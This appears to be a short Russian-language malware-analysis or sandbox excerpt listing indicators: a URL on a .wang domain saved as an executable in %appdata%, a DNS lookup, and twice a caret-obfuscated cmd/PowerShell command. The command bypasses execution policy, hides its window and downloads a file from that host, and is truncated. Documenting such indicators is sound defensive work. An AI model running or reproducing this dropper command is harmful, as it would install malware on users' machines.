Техническая информация
- http://transporingsytw.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^oW^e^Rs^he^l^L.^ExE -exe^C^UtIOnpolicy BYp^as^s -N^o^p^R^o^F^ILE -wI^N^d^oWs^t^y^lE ^HIdDEn (^n^Ew-^obJE^CT s^ys^TEm.nEt.w^e^B^cLi^en^T).D^ow^nloaDfile(^'http://transporingsy...
- DNS ASK tr#####ringsytw.wang
- '<SYSTEM32>\cmd.exe' /c "p^oW^e^Rs^he^l^L.^ExE -exe^C^UtIOnpolicy BYp^as^s -N^o^p^R^o^F^ILE -wI^N^d^oWs^t^y^lE ^HIdDEn (^n^Ew-^obJE^CT s^ys^TEm.nEt.w^e^B^cLi^en^T).D^ow^nloaDfile(^'http://transporingsy...' (со скрытым окном)